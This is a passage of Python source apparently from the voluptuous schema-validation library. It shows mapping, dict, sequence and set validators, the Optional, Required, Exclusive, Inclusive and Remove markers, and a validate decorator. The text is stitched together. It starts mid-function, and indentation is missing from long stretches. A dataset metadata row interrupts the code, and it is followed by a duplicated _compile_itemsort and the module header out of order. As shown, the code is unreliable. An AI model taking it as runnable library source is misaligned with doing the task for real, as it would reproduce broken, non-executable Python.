additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_itemsort():
    '''return sort function of mappings'''

    def is_extra(key_):
        return key_ is Extra

    def is_remove(key_):
        return isinstance(key_, Remove)

    def is_marker(key_):
        return isinstance(key_, Marker)

    def is_type(key_):
        return inspect.isclass(key_)

    def is_callable(key_):
        return callable(key_)

    # Predicates run in list order; the paired number is the sort rank.
    # Extra must match last because it is a catch-all, while Remove
    # must match first (its validation failures are not errors -- other
    # schema keys may still claim the same value).
    priority = [
        (1, is_remove),    # Remove: highest priority after plain values
        (2, is_marker),    # then other Markers
        (4, is_type),      # types/classes: lowest before Extra
        (3, is_callable),  # callables: after markers
        (5, is_extra),     # Extra: lowest priority overall
    ]

    def item_priority(item_):
        candidate = item_[0]
        for rank, predicate in priority:
            if predicate(candidate):
                return rank
        # Literal values match none of the predicates and sort first.
        return 0

    return item_priority


_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
    """Return the schema's (key, value) pairs in matching order.

    Sorting with ``_sort_item`` prevents catch-alls such as ``Extra``
    from being tried before more specific keys (e.g. a Required key
    with its own validation), which would produce false positives.
    """
    return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
    """Yield (name, value) pairs for an object's attributes.

    Handles instances backed by ``__dict__``, namedtuples (through
    ``_asdict``) and classes that define ``__slots__``.
    """
    attrs = {}
    try:
        attrs = vars(obj)
    except TypeError:
        # vars() fails for objects without __dict__; a namedtuple still
        # exposes its fields via _asdict().
        if hasattr(obj, '_asdict'):
            attrs = obj._asdict()
    for pair in iteritems(attrs):
        yield pair
    try:
        slots = obj.__slots__
    except AttributeError:
        pass
    else:
        for name in slots:
            if name != '__dict__':
                yield (name, getattr(obj, name))
class Msg(object):
    """Report a user-friendly message if a schema fails to validate.
    >>> validate = Schema(
    ...   Msg(['one', 'two', int],
    ...       'should be one of "one", "two" or an integer'))
    >>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
    ...   validate(['three'])
    Messages are only applied to invalid direct descendants of the schema:
    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
    >>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
    ...   validate([['three']])
    The type which is thrown can be overridden but needs to be a subclass of Invalid
    >>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
    ...   validate = Schema(Msg([int], 'should be int', cls=KeyError))
    If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
    >>> try:
    ...  validate(['three'])
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], er.RangeInvalid)
    """
    def __init__(self, schema, msg, cls=None):
        # Only Invalid subclasses can flow through the validation
        # machinery's error aggregation; reject anything else early.
        if cls and not issubclass(cls, er.Invalid):
            raise er.SchemaError("Msg can only use subclases of"
                                 " Invalid as custom class")
        # Keep the raw schema (for repr) alongside the compiled one.
        self._schema = schema
        self.schema = Schema(schema)
        self.msg = msg
        self.cls = cls
    def __call__(self, v):
        try:
            return self.schema(v)
        except er.Invalid as e:
            # Errors from nested descendants (path deeper than one
            # level) keep their own, more precise message.
            if len(e.path) > 1:
                raise e
            else:
                raise (self.cls or er.Invalid)(self.msg)
    def __repr__(self):
        return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Schema marker: validate an object's attributes, not dict keys."""

    def __init__(self, schema, cls=UNDEFINED):
        # cls restricts which instance types are accepted; the default
        # UNDEFINED means any object matching the schema is allowed.
        self.cls = cls
        super(Object, self).__init__(schema)
class VirtualPathComponent(str):
    """Path element for synthetic groups (exclusion/inclusion labels).

    Rendered as ``<label>`` so that error paths visually distinguish
    virtual components from real data keys.
    """

    def __str__(self):
        return ''.join(('<', self, '>'))

    __repr__ = __str__
# Markers.py
class Marker(object):
    """Mark nodes for special treatment.

    Base class for Optional/Required/Exclusive/Inclusive/Remove.
    Delegates hashing, equality and ordering to the wrapped schema so
    markers can stand in for plain keys inside mapping schemas.
    """
    def __init__(self, schema_, msg=None, description=None):
        # Keep both the raw schema (for display/ordering) and its
        # compiled form (for validation).
        self.schema = schema_
        self._schema = Schema(schema_)
        self.msg = msg
        self.description = description
    def __call__(self, v):
        try:
            return self._schema(v)
        except er.Invalid as e:
            # Only replace top-level errors with the custom message;
            # errors from nested schemas keep their own, precise text.
            if not self.msg or len(e.path) > 1:
                raise
            raise er.Invalid(self.msg)
    def __str__(self):
        return str(self.schema)
    def __repr__(self):
        return repr(self.schema)
    def __lt__(self, other):
        # Compare by wrapped schema so markers sort alongside plain keys.
        if isinstance(other, Marker):
            return self.schema < other.schema
        return self.schema < other
    def __hash__(self):
        return hash(self.schema)
    def __eq__(self, other):
        return self.schema == other
    def __ne__(self, other):
        return not(self.schema == other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default
    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}
    If 'required' flag is set for an entire schema, optional keys aren't required
    >>> schema = Schema({
    ...    Optional('key'): str,
    ...    'key2': str
    ... }, required=True)
    >>> schema({'key2':'value'})
    {'key2': 'value'}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalize the default into a zero-argument factory so mutable
        # defaults (e.g. list) are created fresh for each validation.
        self.default = default_factory(default)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.
    Exclusive keys inherited from Optional:
    >>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}
    Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...   schema({'alpha': 30, 'beta': 45})
    For example, API can provides multiple types of authentication, but only one works in the same time:
    >>> msg = 'Please, use only one type of authentication at the same time.'
    >>> schema = Schema({
    ... Exclusive('classic', 'auth', msg=msg):{
    ...     Required('email'): basestring,
    ...     Required('password'): basestring
    ...     },
    ... Exclusive('internal', 'auth', msg=msg):{
    ...     Required('secret_key'): basestring
    ...     },
    ... Exclusive('social', 'auth', msg=msg):{
    ...     Required('social_network'): basestring,
    ...     Required('token'): basestring
    ...     }
    ... })
    >>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
    ...   schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
    ...           'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
    """
    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
        # Label shared by all keys that must not co-occur in the data.
        self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
    """ Mark a node in the schema as inclusive.
    Inclusive keys inherited from Optional:
    >>> schema = Schema({
    ...     Inclusive('filename', 'file'): str,
    ...     Inclusive('mimetype', 'file'): str
    ... })
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True
    Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...     schema({'filename': 'dog.jpg'})
    If none of the keys in the group are present, it is accepted:
    >>> schema({})
    {}
    For example, API can return 'height' and 'width' together, but not separately.
    >>> msg = "Height and width must exist together"
    >>> schema = Schema({
    ...     Inclusive('height', 'size', msg=msg): int,
    ...     Inclusive('width', 'size', msg=msg): int
    ... })
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'height': 100})
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'width': 100})
    >>> data = {'height': 100, 'width': 100}
    >>> data == schema(data)
    True
    """
    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        super(Inclusive, self).__init__(schema, msg=msg,
                                        default=default,
                                        description=description)
        # Label shared by keys that must appear together or not at all.
        self.group_of_inclusion = group_of_inclusion
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.
    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...   schema({})
    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
        # Defaults are stored as zero-argument factories; see
        # default_factory() for the normalization rules.
        self.default = default_factory(default)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead, these
    keys will be treated as extras.
    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...    schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}
    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """
    def __call__(self, v):
        # Validate like a normal marker, then signal removal by
        # returning the class itself; callers test `result is Remove`.
        super(Remove, self).__call__(v)
        return self.__class__
    def __repr__(self):
        return "Remove(%r)" % (self.schema,)
    def __hash__(self):
        # Identity hash: each Remove marker is a distinct mapping key,
        # unlike other Markers which hash by wrapped schema.
        return object.__hash__(self)
def message(default=None, cls=None):
    """Convenience decorator to allow functions to provide a message.
    Set a default message:
    >>> @message('not an integer')
    ... def isint(v):
    ...   return int(v)
    >>> validate = Schema(isint())
    >>> with raises(er.MultipleInvalid, 'not an integer'):
    ...   validate('a')
    The message can be overridden on a per validator basis:
    >>> validate = Schema(isint('bad'))
    >>> with raises(er.MultipleInvalid, 'bad'):
    ...   validate('a')
    The class thrown too:
    >>> class IntegerInvalid(er.Invalid): pass
    >>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
    >>> try:
    ...   validate('a')
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], IntegerInvalid)
    """
    # Like Msg, only Invalid subclasses may be raised by validators.
    if cls and not issubclass(cls, er.Invalid):
        raise er.SchemaError("message can only use subclases of Invalid as custom class")
    def decorator(f):
        @wraps(f)
        def check(msg=None, clsoverride=None):
            @wraps(f)
            def wrapper(*args, **kwargs):
                try:
                    return f(*args, **kwargs)
                except ValueError:
                    # Translate ValueError into the configured Invalid
                    # subclass, preferring the per-call override.
                    raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
            return wrapper
        return check
    return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
    """Decorator for validating arguments of a function against a given schema.

    Set restrictions for arguments:

    >>> @validate(arg1=int, arg2=int)
    ... def foo(arg1, arg2):
    ...   return arg1 * arg2

    Set restriction for returned value:

    >>> @validate(arg=int, __return__=int)
    ... def bar(arg1):
    ...   return arg1 * 2
    """
    RETURNS_KEY = '__return__'

    def validate_schema_decorator(func):
        # Build the argument schema, pulling out the special '__return__'
        # key (if any) so the return value can be validated separately.
        schema_arguments = _merge_args_with_kwargs(_args_to_dict(func, a), kw)
        returns_defined = RETURNS_KEY in schema_arguments
        returns = schema_arguments.pop(RETURNS_KEY, None)

        if schema_arguments:
            input_schema = Schema(schema_arguments, extra=ALLOW_EXTRA)
        else:
            # No restrictions at all: identity validator.
            input_schema = lambda x: x
        output_schema = Schema(returns) if returns_defined else lambda x: x

        @wraps(func)
        def func_wrapper(*args, **kwargs):
            arguments = _merge_args_with_kwargs(
                _args_to_dict(func, args), kwargs)
            validated_arguments = input_schema(arguments)
            return output_schema(func(**validated_arguments))
        return func_wrapper
    return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _compile_itemsort | python | def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority | return sort function of mappings | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L834-L871 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
# Python 2/3 compatibility shims: alias the builtins that were removed in
# Python 3 and provide uniform iteritems()/ifilter() helpers so the rest of
# the module can stay version-agnostic.
if sys.version_info >= (3,):
    long = int
    unicode = str
    basestring = str
    ifilter = filter

    def iteritems(d):
        # Py3: items() is already a lazy view.
        return d.items()
else:
    from itertools import ifilter

    def iteritems(d):
        return d.iteritems()

# collections.abc was split out of collections in Python 3.3.
if sys.version_info >= (3, 3):
    _Mapping = collections.abc.Mapping
else:
    _Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Sentinel for "no value given" (distinct from ``None``).

    Instances are intended to be falsy and print as ``...``.
    """

    def __nonzero__(self):  # Python 2 truthiness hook
        return False

    # Bug fix: Python 3 looks for __bool__, not __nonzero__; without this
    # alias the UNDEFINED sentinel evaluated as truthy on Python 3, defeating
    # the intent of __nonzero__ above.
    __bool__ = __nonzero__

    def __repr__(self):
        return '...'


# Shared module-level sentinel instance.
UNDEFINED = Undefined()
def Self():
    """Placeholder for recursive schemas; compiled away by ``Schema._compile``.

    Invoking it directly is always a programming error.
    """
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Normalize a default specification to a zero-argument factory.

    Callables and the ``UNDEFINED`` sentinel pass through untouched; any
    other value is wrapped in a closure that returns it.
    """
    if value is UNDEFINED:
        return value
    if callable(value):
        return value
    return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
    """Doctest helper asserting that *exc* is raised inside the block.

    Optionally checks the exception text for an exact match (*msg*) or a
    regular-expression match (*regex*).  NOTE: it deliberately does NOT fail
    when no exception is raised at all -- it only inspects one if it occurs.
    """
    try:
        yield
    except exc as e:
        text = str(e)
        if msg is not None:
            assert text == msg, '%r != %r' % (text, msg)
        if regex is not None:
            assert re.search(regex, text), \
                '%r does not match %r' % (text, regex)
def Extra(_):
    """Marker allowing keys in the data that the schema does not mention.

    Never invoked as a validator; ``Schema._compile`` special-cases it.
    """
    raise er.SchemaError('"Extra" should never be called')


# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
    def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
        """Create a new Schema.

        :param schema: Validation schema. See :module:`voluptuous` for details.
        :param required: Keys defined in the schema must be in the data.
        :param extra: Specify how extra keys in the data are treated:

            - :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
              extra keys (raise ``Invalid``).
            - :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
              keys in the output.
            - :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
              from the output.
            - Any value other than the above defaults to
              :const:`~voluptuous.PREVENT_EXTRA`
        """
        self.schema = schema
        self.required = required
        self.extra = int(extra)  # ensure the value is an integer
        # Compile eagerly so schema errors surface at construction time.
        self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
    def _compile(self, schema):
        # Dispatch on the schema node's kind and return a validator callable
        # with the signature ``validator(path, data) -> validated_data``.
        if schema is Extra:
            # Extra accepts anything, unchanged.
            return lambda _, v: v
        if schema is Self:
            # Recursive reference back to this (whole) schema.
            return lambda p, v: self._compiled(p, v)
        elif hasattr(schema, "__voluptuous_compile__"):
            # Hook for objects that know how to compile themselves.
            return schema.__voluptuous_compile__(self)
        if isinstance(schema, Object):
            return self._compile_object(schema)
